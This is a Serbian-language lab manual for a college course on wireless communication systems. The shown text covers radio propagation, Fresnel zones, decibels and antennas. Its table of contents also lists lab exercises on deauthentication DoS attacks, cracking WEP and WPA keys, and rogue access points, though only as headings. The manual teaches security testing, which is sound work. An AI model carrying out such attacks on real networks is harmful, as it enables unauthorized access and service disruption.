Бежични комуникациони системи

Μέγεθος: px
Εμφάνιση ξεκινά από τη σελίδα:

Download "Бежични комуникациони системи"

Transcript

1 Верица Васиљевић, Владимир Михајловић, Милош Рокнић, Предраг Гавриловић Бежични комуникациони системи Приручник за лабораторијске вежбе Висока школа електротехнике и рачунарства струковних студија Београд, 2012.

2 Аутори: др Верица Васиљевић, Владимир Михајловић, Милош Рокнић, Предраг Гавриловић Рецензенти: Издавач: За издавача: Лектор: Техничка обрада: Дизајн: Штампа: др Дејан Драјић, др Зоран Бањац Висока школа електротехнике и рачунарства струковних студија у Београду др Драгољуб Мартиновић Анђелка Ковачевић др Верица Васиљевић, Владимир Михајловић, Милош Рокнић, Предраг Гавриловић Мирко Ступар МСТ Гајић Тираж: 55 CIP Каталогизација у публикацији Народна библиотека Србије, Београд :004(075.8)(076) БЕЖИЧНИ комуникациони системи : приручник за лабораторијске вежбе / Верица Васиљевић... [и др.]. - Београд : Висока школа електротехнике и рачунарства струковних студија, 2012 ( Београд : МСТ Гајић ) стр. : илустр. ; 29 cm Тираж Библиографија: стр ISBN Васиљевић, Верица, [аутор] а ) Бежични телекомуникациони системи - Вежбе COBISS.SR-ID

3 Предговор Приручник за лабораторијске вежбе Бежични комуникациони системи намењен је студентима Високе школе електротехнике и рачунарства струковних студија у Београду. Приручник се састоји од 11 лабораторијских вежби, методички обрађених. У Београду, октобра Аутори

4

5 Бежични комуникациони системи Садржај 1. ПРИНЦИПИ ПРЕНОСА БЕЖИЧНИХ СИГНАЛА ТЕОРЕТСКА ОСНОВА ЕФЕКТИ ПРИ ПРОСТИРАЊУ БЕЖИЧНОГ СИГНАЛА... 3 Интерференција... 3 Апсорпција таласа... 4 Одбијање таласа... 5 Блокирање таласа... 6 Дифракција таласа... 6 Расипање таласа... 7 Линија видљивости и Френелове зоне... 8 Вишелинијско простирање СНАГА СИГНАЛА АНТЕНЕ Типови антена Покривеност терена сигналом КАБЛОВИ ТАЛАСОВОДИ КОНЕКТОРИ И АДАПТЕРИ ПРОРАЧУН БУЏЕТА БЕЖИЧНОГ ЛИНКА СА ОПТИЧКОМ ВИДЉИВОШЋУ Пример: Анализа бежичног линка Активност 1: Прорачун буџета бежичног линка УПОТРЕБА АПЛИКАЦИЈА ЗА ПРОРАЧУН И СИМУЛАЦИЈУ БЕЖИЧНИХ КОМУНИКАЦИОНИХ СИСТЕМА ТЕОРЕТСКА ОСНОВА ПРИМЕР ПРОРАЧУНА ТАЧКА-ТАЧКА БЕЖИЧНОГ ЛИНКА Преузимање географских података Постављање карте Креирање мреже и топологије Конфигурација техничких карактеристика радио-система Креирање локација Постављање радио-система на одабране локације Покретање симулације и преглед резултата ПРОРАЧУН ПОКРИВЕНОСТИ ТЕРИТОРИЈЕ РАДИО-СИГНАЛОМ Активност 1: Симулација линка Авала-Фрушка гора Активност 2: Симулација другог линка Авала-Фрушка гора ОПШТИ ПРЕГЛЕД ЛОКАЛНИХ БЕЖИЧНИХ МРЕЖА И АНАЛИЗА МРЕЖНОГ САОБРАЋАЈА ОПШТИ ПРЕГЛЕД БЕЖИЧНИХ ЛОКАЛНИХ РАЧУНАРСКИХ МРЕЖА ПОДЕЛА ОПСЕГА НА КАНАЛЕ ПРЕГЛЕД БЕЖИЧНИХ МРЕЖНИХ ИНТЕРФЕЈСА ПОД ОПЕРАТИВНИМ СИСТЕМОМ LINUX... 47

6 3.4 АРХИТЕКТУРА БЕЖИЧНИХ ЛОКАЛНИХ РАЧУНАРСКИХ МРЕЖА ВРСТЕ ПАКЕТА Контролни рамови Управљачки рамови ПРЕГЛЕД СНИМКА САОБРАЋАЈА УСПОСТАВА ВЕЗЕ СА БЕЖИЧНОМ МРЕЖОМ ПРЕГЛЕД ЈАЧИНЕ СИГНАЛА ПОДЕШАВАЊЕ БЕЖИЧНЕ ПРИСТУПНЕ ТАЧКЕ УВОД ПОДЕШАВАЊЕ ВЕЗЕ КА ЛОКАЛНОЈ МРЕЖИ ПОДЕШАВАЊЕ ВЕЗЕ КА ИНТЕРНЕТУ ПОДЕШАВАЊЕ АДРЕСА ЗА ЛОКАЛНУ МРЕЖУ ПОДЕШАВАЊЕ ПРОСЛЕЂИВАЊА АДРЕСА ПОДЕШАВАЊЕ БЕЖИЧНЕ МРЕЖЕ ПОДЕШАВАЊЕ БЕЗБЕДНОСТИ БЕЖИЧНЕ МРЕЖЕ КОНТРОЛА ПРИСТУПА КОРИШЋЕЊЕМ MAC АДРЕСА НАДГЛЕДАЊЕ БЕЖИЧНОГ МРЕЖНОГ САОБРАЋАЈА СНИМАЊЕ БЕЖИЧНОГ МРЕЖНОГ САОБРАЋАЈА BACKTRACK Активност 1: Упознавање са радним окружењем BаckTrack Активност 2: Преглед активних мрежних адаптера Активност 3: Подешавање мрежног адаптера на Linux оперативном систему МОНИТОР РЕЖИМ РАДА БЕЖИЧНОГ МРЕЖНОГ АДАПТЕРА Активност 4: Постављање бежичног мрежног адаптера у монитор режим рада ПРЕГЛЕД ДОСТУПНИХ МРЕЖА ПРОГРАМОМ KISMET Активност 5: Покретање Kismet програма Активност 6: Детекција бежичних мрежа Kismet програмом НАПРЕДНО КОРИШЋЕЊЕ WIRESHARK ПРОГРАМА ЗА АНАЛИЗУ МРЕЖНОГ САОБРАЋАЈА ФИЛТРИРАЊЕ САОБРАЋАЈА НА ОСНОВУ ИДЕНТИФИКАТОРА ОСНОВНОГ СКУПА СЕРВИСА ФИЛТРИРАЊЕ САОБРАЋАЈА НА ОСНОВУ MAC АДРЕСЕ РАЧУНАРА ФИЛТРИРАЊЕ КОНТРОЛНИХ И УПРАВЉАЧКИХ ОКВИРА ФИЛТРИРАЊЕ ПАКЕТА ПОДАТАКА ДЕТЕКЦИЈА НЕЗАШТИЋЕНИХ ПОДАТАКА Активност 7: Напредна анализа ухваћеног саобраћаја ДОДАТАК IEEE ЗАГЛАВЉЕ ТЕСТИРАЊЕ УПАДА У ЛОКАЛНЕ БЕЖИЧНЕ РАЧУНАРСКЕ МРЕЖЕ УВОД DOS (DENIAL-OF-SERVICE) НАПАДИ У БЕЖИЧНИМ РАЧУНАРСКИМ МРЕЖАМА DoS напад слањем оквира за деаутентификацију Активност 1: Тестирање могућности адаптера за убацивање пакета Активност 2: Деаутентификација бежичних клијената Детекција покушаја деаутентификације... 93

7 Бежични комуникациони системи Активност 3: Анализа детектованог мрежног саобраћаја СКРИВАЊЕ ИДЕНТИФИКАТОРА СКУПА УСЛУГА Активност 4: Откривање скривеног идентификатора скупа услуга ФИЛТРИРАЊЕ MAC АДРЕСА КЛИЈЕНАТА Активност 5: Филтрирање саобраћаја по МАС адресама ПРАКТИЧНА АНАЛИЗА WEP СИГУРНОСНОГ МЕХАНИЗМА УВОД WEP АУТЕНТИФИКАЦИЈА ШИФРОВАЊЕ ПОДАТАКА ПОДЕШАВАЊА WEP ПАРАМЕТАРА НАПАДИ НА WEP Напад понављањем ARP захтева Активност 1: Откривање 64-битног WEP кључа Активност 2: Откривање 128-битног WEP кључа ПРАКТИЧНА АНАЛИЗА WPA/WPA2 СИГУРНОСНОГ МЕХАНИЗМА УВОД WPA/WPA2 АРХИТЕКТУРА WPA-PSK и WPA2-PSK НАПАДИ НА WPA-PSK И WPA2-PSK Пласирање напада Активност 1: Откривање WPA кључа ПОВЕЗИВАЊЕ КЛИЈЕНТА НА МРЕЖУ СА WPA-PSK/WPA2-PSK МЕХАНИЗМОМ ЗАШТИТЕ СОФТВЕРСКА БЕЖИЧНА ПРИСТУПНА ТАЧКА УВОД КОНФИГУРАЦИЈА ОПЕРАТИВНОГ СИСТЕМА НАПАДИ КОРИШЋЕЊЕМ ЛАЖНЕ БЕЖИЧНЕ ПРИСТУПНЕ ТАЧКЕ Активност 1: Конфигурација софтверске приступне тачке Активност 2: Тестирати напад коришћењем лажне бежичне приступне тачке БЕЖИЧНЕ ЛОКАЛНЕ РАЧУНАРСКЕ МРЕЖЕ У КОРПОРАТИВНОМ ОКРУЖЕЊУ УВОД ПОДЕШАВАЊЕ WPA/WPA2-ENTERPRISE Инсталација Активног директоријума и креирање корисничких налога Инсталација сертификационог сервиса и креирање сертификата Инсталација RADIUS сервера Подешавање бежичне приступне тачке Подешавање клијента Активност 1: Конфигурација WPA2-Enterprise механизма заштите УПОТРЕБА MIKROTIK ROUTERОS У БЕЖИЧНИМ МРЕЖАМА MIKROTIK ROUTEROS ПОВЕЗИВАЊЕ НА MIKROTIK СИСТЕМ

8 11.3 ПОДЕШАВАЊЕ БЕЖИЧНЕ ПРИСТУПНЕ ТАЧКЕ НА MIKROTIK УРЕЂАЈУ Активност 1: Конфигурација MikroTik ЛИТЕРАТУРА ЕВИДЕНЦИЈА УРАЂЕНИХ ВЕЖБИ

9 I ВЕЖБА ПРИНЦИПИ ПРЕНОСА БЕЖИЧНИХ СИГНАЛА Циљ вежбе је упознавање студената са основним принципима преноса бежичних сигнала. Вежба обухвата и практично упознавање са елементима и њиховим карактеристикама који чине један бежични систем, као што су антене, конектори и каблови. Студенти се упознају и са прорачунима који се користе при пројектовању одређених врста бежичних система.

10 I Вежба 1. Принципи преноса бежичних сигнала 1.1 Теоретска основа Бежични комуникациони системи користе електромагнетне таласе за пренос сигнала. За разлику од преноса електромагнетних сигнала кроз жичне трансмисионе медијуме, који је предвидљив, пренос електромагнетних таласа кроз бежичне трансмисионе медијуме знатно је сложенији. Да би се пројектовале квалитетне бежичне везе важно је познавати карактеристике електромагнетских таласа и појаве које утичу на њихов квалитет током преноса. Сваки елктромагнетни талас простире се одређеном брзином 1, поседује одговарајућу таласну дужину и учестаност на којој осцилује. Ове три карактеристике електромагнетних таласа повезане су једначином: где је: f учестаност таласа, c брзина светлости, λ таласна дужина. = Како би се стекао осећај о бројним вредностима из ове једначине можемо израчунати таласну дужину GSM сигнала на учестаности од 900MHz, и она износи 33cm. Док таласна дужина сигнала, који се користе у локалним бежичним мрежама на учестаности од 2,4GHz, износи око 12,5cm. Таласна дужина, а самим тим и учестаност таласа, утичу на понашање таласа у току преноса. Постоји неколико једноставних правила, која су се показала као врло корисна, када се планира пројектовање једне бежичне мреже: Што је већа таласна дужина, талас се даље простире. Што је већа таласна дужина, талас боље заобилази и пролази кроз објекте. Што је мања таласна дужина, талас може да пренесе више података. Ако поредимо два таласа исте снаге, таласи са већом таласном дужином имају већи домет него таласи са мањом таласном дужином. Ово се може видети на примеру FM радија. Сигнал емитован на фреквенцији од 88MHz има много већи домет него сигнал емитован на 108MHz, узимајући у обзир да је снага емитовања оба сигнала иста. Талас на води који има дужину 5m, неће бити заустављен од стране штапа дужине 5mm, који вири из воде и представља препреку. Насупрот томе, штап дужине 50m (еквивалент величине брода) биће озбиљна препрека простирању таласа. Раздаљина коју талас може да пређе зависи од његове таласне дужине и величине препреке која му се нађе на путу. Тешко је замислити 1 У вакууму електромагнетни таласи простиру се брзином светлости, док се при проласку кроз гасове или течности делови спектра могу апсорбовати, односно расипати при хаотичном кретању честица, при чему талас престаје да се креће праволинијски па је перцепција да се креће спорије од брзине светлости. 2

11 Бежични комуникациони системи талас како пролази кроз објекат од чврстог материјала, али то јесте случај са електромагнетним таласима. Таласи са већом таласном дужином (самим тим са нижом учестаношћу), боље пролазе кроз објекте него таласи са мањом таласном дужином (самим тим са вишом учестаношћу). На пример, таласи код FM радија (88MHz -108 MHz) лако пролазе кроз зграде и друге препреке, док краћи таласи (као што су код GSM телефона који раде на 900MHz или 1800MHz) то чине много теже. Овај ефекат је делом због разлике у снази сигнала FM радија и GSM-а, али такође и делом због мање таласне дужине GSM сигнала. Што је већа учестаност таласа (што талас брже осцилира) више информација може да пренесе свака пуна осцилација таласа (једна периода, Т) може да пренесе један или више битова информација, у зависности од модулације која се користи (нпр. QPSK, 8PSK). 1.2 Ефекти при простирању бежичног сигнала Интерференција Када се ради са електромагнетним таласима, није тачно да је један плус један увек једнако два. Некада збир може бити и нула. Слика 1.1 : а) Конструктивна интерференција б) Деструктивна интерференција Ово се лако може приказати на примеру два синусоидна сигнала. Ако су сигнали који се сабирају истих фаза (у фази) и истих амплитуда, као у примеру са слике 1.1а, амплитуда резултујућег сигнала једнака је збиру двеју амплитуда (1 + 1 = 2). Оваква појава назива се конструктивна интерференција 2. Ако су сигнали који се сабирају супротних фаза, а истих амплитуда, као у примеру са слике 1.1б, амплитуда резултујућег сигнала једнака је разлици двеју амплитуда (1 + (-1) = 0). Оваква појава назива се деструктивна итерференција 3. У бежичној технологији реч интерференција обично се користи у ширем значењу, на пример за међусобне сметње два RF 4 извора (два суседна канала). Тако да се под појмом интерференција у бежичним мрежама подразумевају сметње у мрежи изазване неким другим извором радио таласа. Интерференција представља један од главних проблема када се планира изградња 2 Constructive interference 3 Destructive interference 4 Radio Frequency 3

12 I Вежба бежичних линкова, поготово у урбаним срединама или затвореном простору, где много мрежа користи исти фреквенцијски опсег. Кад год се укрсте путање таласа који имају једнаку амплитуду а супротну фазу, таласи се поништавају и примљени сигнал је знатно ослабљен. Чест случај је да се укрштањем путања добије талас који је изобличен и који се не може употребити. Модулационе технике и коришћење више канала за пренос електромагнетних таласа могу да помогну у разрешавању, али не и да у потпуности елиминишу проблем интерференције. Апсорпција таласа Када електромагнетни таласи наиђу на физичке препреке они губе одређену количину енергије. Колико ће енергија таласа бити умањена зависи од учестаности електромагнетног таласа као и од самог материјала од кога је препрека израђена. Често се користи коефицијент апсорпције како би се описао утицај материјала на зрачење. За микроталасе два главна апсорбујућа материјала су: Метал. Електрони се крећу слободно у металима и лако апсорбују енергију таласа који пролази кроз њих. Вода. Микроталаси потискују молекуле воде и одузимају електромагнетном таласу одређену енергију. У практичној имплементацији бежичних мрежа можемо сматрати да су метал и вода савршени апсорбери електромагнетне енергије и да таласи не могу да пролазе кроз њих (додуше танки слојеви воде ће пропустити одређену количину електромагнетне енергије таласа). Код пројектовања бежичних система треба имати на уму да се вода јавља у неколико облика: киша, магла, ниски облаци, итд. Ове појаве имају одређени утицај на радио-таласе, нарочито на оне виших учестаности. Постоје и други материјали који утичу на апсорпцију радио-таласа. Вегетација и дрвеће апсорбују радио-таласе у зависности од количине воде коју садрже. Сува дрвена грађа има мањи степен апсорпције од дрвећа са вегетацијом. Пластика и њој слични материјали у принципу не апсорбују енергију таласа. Али је увек добро испитати карактеристике материјала. Пластика се често користи за израду кућишта предајника, јер је добар материјал за заштиту од временских услова. Када сами израђујете заштитна кућишта за системе који раде на 2,4GHz, најлакши начин да се тестира пластични материјал је да се његов узорак стави у микроталасну пећ на пар минута (микроталасне пећи раде на учестаности од 2,4GHz). Ако је узорак пластике загрејан то значи да тај материјал апсорбује енергију радиоталаса и да га не треба користити за израду кућишта. Код пројектовања бежичних мрежа треба такође обратити пажњу на то да људско тело добро апсорбује радио-сигнал пошто његов велики проценат чини управо вода. То значи да би билo погрешно када би се нпр. поставиле бежичне приступне тачке у сајамској хали на висини од једног до два метра. Велики број присутних људи у сајамској хали довео би до слабљења радиосигнала, па би могло да се деси да хала не буде у потпуности покривена бежичним сигналом. 4

13 Бежични комуникациони системи Одбијање таласа Радио-таласи (као и светлосни таласи) одбијају 5 се од равне површине која је значајно већих димензија од њихове таласне дужине. Материјали од којих се најчешће одбијају радио-таласи су метал и вода. Слика 1.2 : Одбијање (рефлексија) таласа При одбијању таласа одбојни угао једнак је упадном углу. У зависности од упадног угла, храпавости и површине препреке, одбијени сигнал може бити значајно слабији. Треба обратити пажњу на то да, рецимо, метална решетка има исти утицај на талас као и метална површина, све док је размак између решетки доста мањи од таласне дужине сигнала. Појаву одбијања таласа (слика 1.3а) можемо искористити код пројектовања антена. Постављањем рефлектујуће површине параболичног облика (слика 1.3б) из радио-примопредајника може се сакупити широки сноп радио-сигнала у једну тачку. Слика 1.3 : а) Одбијање радио-таласа б) параболична антена 5 Reflection 5

14 I Вежба Блокирање таласа Када бежични сигнал (талас) наиђе на препреку која му онемогућава директан пролаз долази до његовог блокирања 6 (ефекта потпуног слабљења). Што је фреквенција сигнала виша то га је лакше блокирати. Дифракција таласа Слика 1.4 : Блокирање таласа Принцип који се може применити на све врсте електромагнетних таласа, а који је користан да би се разумело простирање таласа, познат је као Хајгенсов принцип. Принцип се може описати на следећи начин: свака честица средине на коју наилази неки талас постаје извор сферних таласа. Уколико раван талас, простирући се кроз неку средину, наиђе на препреку са прорезом, пролазећи кроз прорез талас престаје да буде раван (слика 1.5). Наиме, око сваке тачке у прелазној линији настају сферни таласи а резултујући талас настаје као обвојница око мноштва тако формираних сферних таласа. Дифракција представља појаву привидног скретања таласа са првобитног правца простирања (формирање нових праваца простирања) при његовом наиласку на ивице отвора или на препреку. За овај ефекат каже се да талас залази у област геометријске сенке (слика 1.6). 6 Shadowing 6

15 Бежични комуникациони системи Слика 1.5 : Дифракција таласа Дифракција се може представити и као појава скретања таласа иза углова и препрека. Микроталаси са таласном дужином од неколико центиметара скренуће када талас наиђе на зидове, планинске врхове и друге препреке. Важно је истаћи да је енергија оваквог таласа знатно мања од енергије таласа који је проузроковао дифракцију. Расипање таласа Слика 1.6 : Дифракција преко планинског врха У случају да електромагнетни талас наиђе на препреку која је једнака или мања од његове таласне дужине, или ако наиђе на храпаву препреку великих димензија, долази до појаве расипања (расејавања 7 ) таласа. Главни сигнал је расејан на неколико слабијих сигнала (слика 1.7). Ако узмемо у обзир да су таласне дужине, које су најчешће у употреби, између 10cm и 20cm, можемо закључити да постоји доста објеката у урбаном окружењу(бандере, саобраћајни знаци, лишће...) који би проузроковали расејавање оваквих таласа. 7 Scattering 7

16 I Вежба Линија видљивости и Френелове зоне Слика 1.7 : Расипање сигнала Појаве одбијања, дифракције и расипања имају и позитивне и негативне ефекте на пропагацију бежичног сигнала: позитивни ефекти омогућавају да сигнал стигне до пријемника и без директне оптичке видљивости, што је јако битно за пренос бежичног сигнала у урбаном окружењу, негативни ефекти проузрокују нестабилност сигнала на пријемној страни у времену и простору. На свом путу од предајника до пријемника, електромагнетни талас се шири у средишњој тачки и поново смањује када се приближава предајнику. На слици 1.8 илустровано је простирање таласа између две усмерене антене између којих постоји оптичка видљивост 8 (није нарушена препрекама). Иако нема видљивих препрека на већим удаљеностима сама површина Земље почиње да представља препреку за пренос микроталаса због своје закривљености. Слика 1.8 : Линија видљивости Без обзира што постоји линија оптичке видљивости до удаљеног пријемника то не значи да је остварена и линија видљивости за електомагнетни талас. Електромагнетни сигнал се при простирању шири док не достигне средину своје путање, као што је илустровано на слици 1.9. Слика 1.9 : Линија видљивости са препрекама 8 LOS Line of Sight 8

17 Бежични комуникациони системи Ако бежични сигнал наиђе на препреке на свом путу од предајника до пријемника, доћи ће до појаве одбијања сигнала од препреке. Одбијени бежични сигнали могу имати такав фазни померај да ослабе директни сигнал на пријему. Иста појава може да доведе до појачања директног сигнала када се фазе одбијеног сигнала и директног сигнала поклопе. Сигнал измећу пријемника и предајника може се замислити као тродимензионални објекат који се добија ротацијом елипсе око своје хоризонталне осе. Математичким путем (прорачун Френелових зона) може се приказати да ли објекти који леже унутар низа концентричних кругова око правца линије оптичке видљивости, између два примопредајника, имају позитиван или негативан утицај на пренос сигнала. Френелове зоне представљају области у којима је разлика између дужине пута коју прелази директан талас и талас који долази другом путањом, мања или једнака nλ/2, где n представља број Френелове зоне. Утврђено је да 60% прве Френелове зоне не сме бити нарушено препрекама како би слабљење сигнала било у прихватљивим границама. Општа формула за израчунавање пречника Френелове зоне у било којој тачки измећу предајника и пријемника је: где је: = r n полупречник n-те Френелове зоне изражен у метрима d 1 удаљеност од посматране тачке до предајника изражена у метрима d 2 удаљеност од посматране тачке до пријемника изражена у метрима λ таласна дужина изражена у метрима Како би се стекао осећај о бројним вредностима можемо разматрати случај када се два примопредајника налазе на растојању од 10km, док је учестаност микроталасног носиоца 2,4GHz. Пречник прве Френелове зоне на средини линка износи 17,66m. На радној учестаности од 28GHz, пречник прве Френелове зоне био би 5,17m. Ако се примени правило да 60% прве Френелове зоне не сме бити нарушено, за поуздан пренос сигнала потребно је да нема никаквих препрека на половини растојања између предајника и пријемника у пречнику од 10,59m око линије оптичке видљивости. На растојању од једног километра од предајника не сме бити препрека у пречнику од 6,36m. Вишелинијско простирање На слици 1.10 приказани су бежични предајник на левој страни и бежични пријемник на десној страни. Бежични сигнал који шаље предајник може се пренети линијом видљивости (директан сигнал), а може се одбити од зграде или се може расејати и на тај начин сигнал може различитим путањама доћи до пријемника. Овај ефекат назива се вишелинијско простирање 9 (вишепутно простирање) сигнала. Поједностављена слика приказује само три могуће путање за бежични сигнал, док код преноса сигнала у реалним условима постоји много већи број могућих путања. 9 Мulti-path propagation 9

18 I Вежба Сигнали који се одбијају о препреке прелазе дужи пут него сигнал који путује линијом видљивости. Како електромагнетни таласи имају коначну брзину простирања, долази до појаве да одбијени сигнали стижу на одредиште уз одређено кашњење, што доводи то тога да је сигнал на пријему проширен због кашњења компонената тог сигнала. Ова појава назива се проширивање кашњења 10. GSM системи могу да толеришу до 16us разлике при кашњењу сигнала (време између прве и последње вишелинијске компоненте сигнала), што представља око 5km разлике између путања сигнала. Слика 1.10 : Вишелинијско простирање Први ефекат ове појаве је да ће кратак импулс сигнала који је предајник послао на пријему бити примљен као шири импулс или вероватније као неколико слабијих импулса сигнала. Ако постоје само три путање, као на слици, пријемник ће примити три слабија импулса сигнала иако је предајник послао само један импулс. У реалном систему са неколико стотина могућих путања сигнала, пријемник ће примити велики број слабијих импулса. Пошто свака путања проузрокује одређено слабљење сигнала, снага сигнала на пријему биће различита. Неки од примљених импулса биће толико слаби да неће бити могућа њихова детекција већ ће представљати шум на пријемнику. На слици 1.10 може се видети да је други импулс раздвојен од првог импулса на страни предајника. На пријемној страни долази до интерференције сигнала. Ако узмемо да један импулс представља симбол, а један или више симбола представљају бит, eнергија намењена једном симболу сада делимично прелази и на суседне симболе. Овај ефекат назива се интерсимболска интерференција. Када је ширење сигнала веће од 20% у односу на трајање симбола интерсимболска интерференција може представљати проблем. Што је брзина преноса података већа то је овај ефекат израженији и доводи до ограничавања пропусног опсега радио-канала са вишеструком пропагацијом. Овај проблем посебно је изражен у случају да се пријемник, предајник или оба ова уређаја физички крећу. 1.3 Снага сигнала Електромагнетни таласи носе одређену количину енергије, а количина енергије примљена у одређеној јединици времена представља снагу. Снага бежичног сигнала има велику важност код пројектовања бежичних мрежа и бежичних линкова. 10 Delay spread 10

19 Бежични комуникациони системи За изражавање снаге најчешће се користе децибели (db). Децибел је логаритамска јединица која се користи да опише однос између две величине. Тај однос може бити однос снаге, притиска, звука, напона, или интензитет неких параметера сигнала. = 10 [ ] N представља однос снага, P 1 представља излазну снагу сигнала, док је P 2 референтна вредност (или улазна снага). Ако на пример, предајник шаље сигнал (P 2 ) јачине 1W, ако пријемник прими сигнал (P 1 ) од 0.5W, то значи да постоји слабљење од 3dB. Јединице у овој једначини морају да се скрате, нпр: 10 0,5 1 = 3,01 Из овога се види да је децибел неименован број јер представља однос снага два сигнала. Такође можемо закључити да свако слабљење од 3dB представља сигнал за 50% слабији од улазног сигнала. И обратно, свако појачање од 3dB представља сигнал за 100% јачи од улазног сигнала. Табела 1.1 приказује однос снага изражен у децибелима и однос снага сигнала P 1/ P 2 : Снага у децибелима Појачање х пута 3dB 2 10dB 10 20dB dB dB dB dB Табела 1.1 : Однос снага изражен у db Поред овог односа, децибел може приказивати и однос посматраног сигнала и неког референтног сигнала, нпр. 1mW. У овом случају децибел би имао ознаку dbm, а једначина у овом случају је следећа: = 10 1 Однос сигнала и шума је термин који описује колико је корисни сигнал јачи од шума који утиче на сигнал. 1.4 Антене Антена представља електрични проводник или систем електричних проводника чија је намена сакупљање, односно емитовање електромагнетних таласа. Оне претварају електрични сигнал у елекромагнетне таласе и обратно. Антене имају ту могућност да једнако добро шаљу и примају сигнал, али не истовремено. Ова карактеристика антена омогућава да се користи само једна антена и за слање сигнала и за пријем сигнала. 11

20 I Вежба Постоје разне врсте антена, а њихове перформансе зависе од неколико карактеристика: појачање антене, дијаграм зрачења, резонантна фреквенција, поларизација и ефикасност. Важно је познавати значење ових карактеристика ради одабира одговарајуће антена. Појачање антене се користи да се опише количина енергије коју антена може да фокусира у одређеном смеру. Појачање антене се представља као однос којим се пореде перформансе посматране антене са перформансама референтне антене. Најчешће се за референтну антену узима идеална изотропска антена. Изотропска антена теоријски представља, тачку која у свим правцима зрачи једнаку количину енергије. Када се као референтна антена користи изотропска антена, онда се појачање антене представља јединицом dbi. Неки произвођачи као референтну антену за поређење перформанси користе дипол антену, јединица која се користи у том случају је dbd. Однос ове две јединице је: 0dBd = 2,15dBi. Дијаграм зрачења представља област зрачења антене. Приказује се графички уз помоћ вертикалне (elevation, E-plane) и хоризонталне (azimut, H-palne) пројекције. Вертикална пројекција приказује како појачање антене варира када би се антена посматрала из профила, док хоризонтална пројекција приказује варијације појачања посматрано из птичије перспективе. На слици 1.11 може се видети дијаграм зрачења антене. Слика 1.11 : Дијаграм зрачења антене Из ове карактеристике проистиче појам усмерености антене, који описује колика је могућност антене да усмери (фокусира) енергију у једном правцу, и онемогући расипање енергије у осталим правцима. Што је боља усмереност антене, то је боље појачање у основном (примарном) правцу зрачења. Учестаност на којој антена има најбоље перформансе назива се резонантна учестаност (фреквенција). Антена не може да ради једнако добро на различитим учестаностима, пошто димензије одређених делова антене директно утичу на њене карактеристике. Физичка величина антене зависи од таласне дужине сигнала коју антена теба да прима или емитује. То значи да се физичке димензије појединих делова антене мењају у зависности од промене учестаности. На слици 1.12 приказана је зависност димензија дипол антене од таласне дужине. 12

21 Бежични комуникациони системи Слика 1.12 : Однос таласне дужине и величине антена код дипол и Yagi антена Дипол антене имају најбољу ефикасност ако им је дужина једнака половини таласне дужине сигнала. Ако се на једном крају антене налази рефлектујућа површина (нпр. кров аутомобила) онда је довољно да дужина дипол антене буде једнака четвртини таласне дужине сигнала. Овакав тип антене се среће под називом Marconi антена. На слици 1.11 приказана је и зависност димензија Yagi антене од таласне дужине сигнала за коју се антена пројектује. Када антену побудимо електричном енергијом она почиње да ствара електромагнетно поље око себе. Оријентација овог електромагнетног поља одређује поларизацију антене. Поларизација антене може бити: вертикална (слика 1.13а), хоризонтална (слика 1.13б) и циркуларна (слика 1.14). Када је поље вертикално оријентисано онда је реч о вертикалној поларизацији. Већина антена које се користе у бежичним рачунарским мрежама имају ову врсту поларизације. Код циркуларне поларизације електромагнетно поље ротира приликом пропагације сигнала. 13

22 I Вежба Слика 1.13 : Поларизација антена а) вертикална б) хоризонтална Приликом инсталације антена потребно је водити рачуна о смеру поларизације пошто може доћи до деградације сигнала ако се антена са нпр. вертикалном поларизацијом постави у хоризонталан положај. Слика 1.14 : Циркуларна поларизација антена Такође, битно је напоменути да сигнал који је нпр. емитован са вертикалном поларизацијом може да стигне на одредиште другачије оријентисан. До промене полатизације долази када електромагнетни таласи на свом путу наиђу на препреку или рефлектујућу површину. Такве 14

23 Бежични комуникациони системи промене је тешко предвидети па је најједноставније решење да се променом положаја антене при монтажи оствари најбољи могући пријем сигнала. Из табеле 1.2 може се уочити да кружна поларизација има најмање слабљење када се са друге стране везе налази антена са линеарном поларизацијом. Код линеарне поларизације електромагнетни талас осцилује у једној равни, хоризонталној или вертикалној. До промене поларизације сигнала може доћи услед рефлексије сигнала на путу од предајника до пријемника. Циркуларна поларизација антена је погодна за мобилне уређаје јер пријемник често мења положај (нпр. мобилни телефони). Поларизација Слабљење Радио-талас Антена сигнала вертикална вертикална 0dB вертикална хоризонтална 20dB вертикална циклична 3 db вертикална искошена (45 ) 3 db хоризонтална вертикална 20 db хоризонтална хоризонтална 0 db хоризонтална циклична 3 db хоризонтална искошена (45 ) 3 db циркуларна (десни смер) циркуларна (леви смер) 20 db циркуларна (десни смер) циркуларна (десни смер) 0 db циркуларна (леви смер) циркуларна (леви смер) 0dB Табела 1.2 : Слабљење услед различите поларизација радио-таласа и антене Ефикасност антене се представља као однос електромагнетног зрачења антене и количине електричне енергије која је то зрачење проузроковала. Ефикасност антене зависи од великог броја фактора као што су врста материјала коришћена при изради антене, тачност димензија антене, сам дизајн антене, итд. Типови антена Омнидирекционе и усмерене антене представљају два основна типа антена. Ова два типа антена разликују се по начину фокусирања сигнала.типови антена који су најчешће у употреби су: дипол ( штап ) антена, усмерена панел антена, Yagi антена и параболична рефлектујућа антена. Дипол антена од 2,2 dbi је најчешће коришћена антена у затвореном простору. Може се видети на скоро свим бежичним мрежним адаптерима. На бежичним приступним тачкама се обично користе дипол антене са мало већим појачањем сигнала. Дијаграм зрачења ове врсте антена има облик крофне, што се може видети на слици

24 I Вежба Слика 1.15 : Дипол антена - изглед и дијаграм зрачења Може се приметити да пропагација сигнала није велика по вертикалној оси, није пуних 360 као код идеалне изотропске антене. Идеја је да антена има бољу пропагацију сигнала по хоризонталној оси, јер је боље да, рецимо, сигнал покрива цео један спрат него да се сигнал простире делимично и на остале спратове у објекту. Усмерене антене имају задатак да обезбеде већу покривеност у халама, дугачким ходницима и на већим удаљеностима где је потребна веза између две тачке. Cisco модел антене AIR-ANT2485P-R представља усмерену антену са појачањем од 8,5dBi. Може се приметити велика разлика у појачању у односу на омнидирекциону антену у облику штапа која се користи унутар објеката. Ова антена се популарно назива и панел антена пошто је равна, а њен дијаграм зрачења је илустрован на слици Слика 1.16 : Панел антена илустровани дијаграм зрачења и изглед На слици 1.17 може се видети и пропагација сигнала по хоризонталној и вертикалној равни ове антене. 16

